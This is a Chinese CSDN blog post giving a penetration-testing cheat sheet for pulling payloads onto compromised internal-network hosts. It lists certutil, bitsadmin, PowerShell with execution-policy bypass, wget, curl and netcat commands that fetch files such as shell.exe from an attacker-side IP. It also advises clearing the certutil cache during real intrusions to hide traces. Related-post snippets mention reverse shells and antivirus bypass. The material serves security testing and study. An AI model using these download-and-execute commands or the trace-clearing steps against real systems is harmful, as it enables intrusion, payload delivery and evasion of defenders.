内网渗透下载文件

最新推荐文章于 2023-09-04 14:33:11 发布
最新推荐文章于 2023-09-04 14:33:11 发布
阅读量771 收藏
点赞数
分类专栏: 内网渗透 文章标签: windows web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yu3511606536/article/details/129269358
版权

内网渗透下载文件

Windows

certutil

不加保存的文件名

certutil -urlcache -split -f http://192.168.66.245:8000/shell.exe

添加需要保存的文件名

certutil -urlcache -split -f http://192.168.66.245:9000/shell.exe test.exe

certutil在下载文件时会在缓存目录保存副本,所以在真实渗透中,需要清理缓存目录

缓存目录为:%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

使用命令直接删除

certutil -urlcache -split -f http://192.168.66.245:9000/shell.exe delete

查看缓存内容

certutil.exe -urlcache *

bitsadmin

只适用于Windows7及以上的系统版本

使用bitsadmin下载文件,指定保存路径与文件名

bitsadmin /rawreturn /transfer getfile http://192.168.66.245/raw.exe C:\Users\mssql\Desktop\asd\cc.exe

bitsadmin /rawreturn /transfer getpayload http://192.168.66.245/raw.exe C:\Users\mssql\Desktop\asd\dd.exe

带进度条

bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.66.245/raw.exe" "C:\Users\mssql\Desktop\asd\ee.exe"

如果下载文件过大,可以提高优先级

bitsadmin /setpriority 比如high
FOREGROUND
HIGH
NORMAL
LOW

PowerShell

Windows7及以上系统默认自带powershell

一句话下载

powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.66.245/raw.exe','C:\Users\mssql\Desktop\a.exe')

powershell (new-object Net.WebClient).DownloadFile('http://192.168.66.245/raw.exe','C:\Users\mssql\Desktop\b.exe')

Linux

wget

wget http://192.168.66.245/raw.exe

curl

curl -O http://192.168.66.245/raw.exe

nc

接收端

nc.exe -l -p 9999 > xxxxxx.exe

发送端

nc64.exe 192.168.5.132 9999  < raw.exe
L1nYuan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bitsadmin命令(Windows下载文件命令)
墨痕诉清风的博客
07-27 7111
【代码】bitsadmin命令(Windows下载文件命令)
渗透中Windows利用Certutil进行文件下载
最新发布
大河之犬的博客
09-26 2530
是一个合法Windows文件,用于管理Windows证书的程序。此合法Windows服务现已被广泛滥用于恶意用途渗透中主要利用其下载、编码、解码、替代数据流等功能可以在命令行用certutil -?
本地部署项目➕内透
qq_44066170的博客
10-10 1578
如果有玩客云的可以刷个Linux系统或者旧电脑装Linux小黄鱼或某多多上面也就几十块钱,没有的话也可以电脑上用vm虚拟机装个Linux的系统,由于我的小主机还没到所以我打算先用虚拟机,给你们演示一下大概流程步骤简单, 1.第一步当然是准备系统镜像文件虚拟机的话直接下载读取就行了,如果说你要给你的电脑或者小主机安装Linux的话你先要准备一个U盘8g以上,下载工具UltraISO进行刻录,镜像文件可以去阿里镜像站下载速度快。2.第二步配置系统环境安装Apache或Nginx+MySQL+php一般程序都是用
干货分享:渗透测试中常用的文件下载方式
K_HACK77的博客
05-26 1476
0x01 Windows certutil certutilWindows自带的工具,具有下载文件,校验文件MD5、SHA1、SHA256,文件base64编码等功能。 使用certutil下载文件,保存在当前路径,文件名称与下载文件名称相同: certutil -urlcache -split -f http://remote.url/certutil.test 保存当前路径,指定保存文件名称: certutil -urlcache -split -f http://rem.
渗透测试中常用的文件下载方式总结
qq_32660043的博客
02-24 960
那些常见的文件下载姿势总结。
Certutil工具(Windows命令行下载常用)
热门推荐
bring_coco的博客
05-28 3万+
Certutil包含一个编码参数(编码)。这有助于在Base64中编码文件的内容。这是在Windows中等效于Linux中的base64命令。不能打开.exe可执行文件时候,可以使用certutil对可执行文件进行编码。然后传输编码后的数据,然后在接收机上对其进行解码。这里创建一个名为test.txt的文本文件,输入一些内容,打开powershell命令:Add-Content test.txt “ni hao”编码(base64)
内网渗透思维导图.pdf
11-13
一张全方位介绍内网渗透技术及工具的思维导图文档。
内网渗透测试安全学习ppt
02-12
内网渗透测试是网络安全领域中的一个重要环节,主要针对企业或组织内部网络进行的安全评估和漏洞检测。这个过程旨在模拟黑客的攻击行为,发现并修复安全漏洞,以保护关键信息和系统不受恶意攻击。以下是内网渗透测试...
内网渗透常用手法.doc
07-18
### 内网渗透常用手法详解 #### 一、引言 在网络安全领域,内网渗透是一种常见的技术手段,用于评估企业或组织内部网络的安全性。本文将深入探讨黑客进行内网渗透时常用的策略和技术,帮助读者更好地理解内网渗透...
这是一个关于内网渗透的文档
09-14
### Empire内网渗透工具概述与使用教程 #### 一、Empire工具简介 **Empire**是一款高级的内网渗透框架,主要针对Windows环境下的Powershell进行操作。该工具集成了众多功能强大的模块,旨在帮助安全研究人员进行...
内网渗透讲解与实验手册
05-16
### 内网渗透讲解与实验手册 #### 一、内网渗透概述 内网渗透测试是一种模拟黑客行为的安全评估活动,旨在发现并利用组织内部网络中的安全漏洞。它可以帮助企业了解其网络安全防御体系的强度,并识别潜在的安全...
Bypass | Windows中的文件下载方法
good good study
09-04 1077
有时候我们可以执行命令,我们想上线cs,但是主机上存在杀软,使用一般的方式都会被拦截,此时如何下载文件进行上线了?
内网渗透:九、certutil-远程下载绕过
liu_jia_liang的博客
03-11 2008
内网渗透:九、certutil-远程下载绕过 目录 内网渗透:九、certutil-远程下载绕过 一、CertUti 使用语法 :windows 二、certutil绕过*混淆方式 一、CertUti Certutil.exe 是作为证书服务的一部分安装的命令行程序。您可以使用 Certutil.exe 转储和显示证书颁发机构 (CA) 配置信息、配置证书服务、备份和还原 CA 组件以及验证证书、密钥对和证书链。 当 certutil 在没有附加参数的证书颁发机构上运行时...
bitsadmin windwos自带下载命令
浅笑996的博客
06-29 530
bitsadmin的四种下载文件的方法 一、 bitsadmin /rawreturn /transfer getfile http://qianxiao996.cn/1.txt c:\1.txt 二、 bitsadmin /rawreturn /transfer getpayload http://qianxiao996.cn/1.txt c:\1.txt 三、 bitsadmin /transfer qianxiao996 http://qianxiao996.cn/1.txt c:\
【渗透笔记】内网文件传输
白菜猪肉炖粉条
01-04 881
Windows FTP ftp没有设置认证,允许匿名登录的话,攻击者如果知道了机器开启ftp协议,他可以直接登录机器。 还有ftp要做一个比较好的目录权限控制,即使设置了账号密码,攻击者可以通过爆破,如果ftp目录有读取写入执行权限,攻击者会上传文件进而反弹shell。 py开启ftp服务 pip3 install pyftpdlib python3 -m pyftpdlib 脚本文件ftp.txt,用于连接ftp服务,下载文件 copy con ftp.txt open 192.168.1.111 21
Windows 反弹shell方法
weixin_53747497的博客
07-12 2767
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
[3月27日的脚本] 修复Event ID 4107 and Event ID 11 问题(VBScript)
微软一站式示例脚本库 中文官方博客
04-01 994
脚本下载:BulkFixIssuesOfEventID4107AndEventID11.zip http://gallery.technet.microsoft.com/scriptcenter/Script-to-fix-issues-of-2ec8407a 本脚本示例展示了如何修复KB2328240中描述的“EventID 4107 or Event ID 11 is logged in
内网信息收集与上传下载
技术超强的网络安全平台
12-06 189
在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础。 可以说内网渗透测试,其本质就是信息收集。信息收集的深度,直接关系到内网渗透测试的成败。当你拿下内网的一台主机后,面对的是一片未知的区域,所以首先要做的就是对当前所处的网络环境进行判断。包括以下几点: 对当前机器角色的判断 对当前机器所处的网络环境进行判断 对当前机器所处的网络区域进行判断 本机信息收集 查看当前用户、权限 whoamiwhoami /all // 查看当前域并获.
certutil在渗透测测试中的使用技巧
mingyqf的博客
03-10 387
转发至:https://www.cnblogs.com/backlion/p/7325228.html 0x01 前言 最近在Casey Smith‏ @subTee的twitter上学到了关于certutil的一些利用技巧。本文将结合自己的一些经验,介绍certutil在渗透测试中的应用,对cmd下downloader的实现方法作补充。 0x02 certutil简介 用于备份证书服务管理,支持xp-win10 更多操作说明见https://technet.microsoft.com/zh-cn/libr
Windows内网渗透:远程执行命令技巧
"该文档详细介绍了在Windows内网环境中远程执行命令的多种方法,包括计划任务、WMI、WinRM、Smbexec和服务方式,适用于内网渗透测试。文中提供了具体的命令行示例,并提到了一些工具和技巧,如wmicmd、wmiexecVBS...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值